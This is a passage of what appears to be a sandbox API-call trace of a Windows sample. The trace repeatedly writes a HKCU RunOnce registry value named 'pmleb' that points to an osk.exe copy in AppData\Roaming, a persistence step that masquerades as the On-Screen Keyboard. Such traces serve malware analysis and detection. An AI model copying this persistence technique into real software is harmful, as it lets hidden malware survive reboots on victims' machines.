lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.079] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6c [0092.079] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.080] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6b [0092.080] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.080] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.080] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.080] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.080] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.080] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.080] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.081] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.081] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.081] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | 
out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.081] RegCloseKey (hKey=0x280) returned 0x0 [0092.081] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.081] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.081] SetTimer (hWnd=0x20280, nIDEvent=0x21e7, uElapse=0xa, lpTimerFunc=0x0) returned 0x21e7 [0092.082] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.092] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.092] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.092] KillTimer (hWnd=0x20280, uIDEvent=0x21e7) returned 1 [0092.093] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.093] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.093] IUnknown:Release (This=0x787518) returned 0x1 [0092.093] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.093] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.093] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, 
wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.094] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.094] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.094] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.094] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.094] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.094] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.094] 
FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6c [0092.094] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.094] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6d [0092.094] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.095] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6c [0092.095] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.095] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.095] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.095] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.095] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.095] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, 
lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.095] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.096] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.096] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.096] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.096] RegCloseKey (hKey=0x280) returned 0x0 [0092.096] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.096] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.096] SetTimer (hWnd=0x20280, nIDEvent=0x21e8, uElapse=0xa, lpTimerFunc=0x0) returned 0x21e8 [0092.096] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.108] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.108] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.108] KillTimer (hWnd=0x20280, uIDEvent=0x21e8) returned 1 [0092.108] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.108] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, 
Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.109] IUnknown:Release (This=0x787518) returned 0x1 [0092.109] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.109] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.109] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.109] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.109] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 
[0092.109] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.109] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.109] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.110] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.110] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6d [0092.110] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.110] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6e [0092.110] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, 
puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.111] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6d [0092.111] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.111] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.111] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.111] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.111] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.111] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.111] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, 
lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.112] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.112] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.112] RegCloseKey (hKey=0x280) returned 0x0 [0092.112] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.112] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.112] SetTimer (hWnd=0x20280, nIDEvent=0x21e9, uElapse=0xa, lpTimerFunc=0x0) returned 0x21e9 [0092.112] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.123] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.123] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.124] KillTimer (hWnd=0x20280, uIDEvent=0x21e9) returned 1 [0092.124] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.124] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.124] IUnknown:Release (This=0x787518) returned 0x1 [0092.124] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.125] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.125] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), 
lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.125] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), 
ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.125] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6e [0092.125] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.125] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6f [0092.126] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.126] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6e [0092.127] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.127] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.127] IUnknown:Release (This=0x7a9740) 
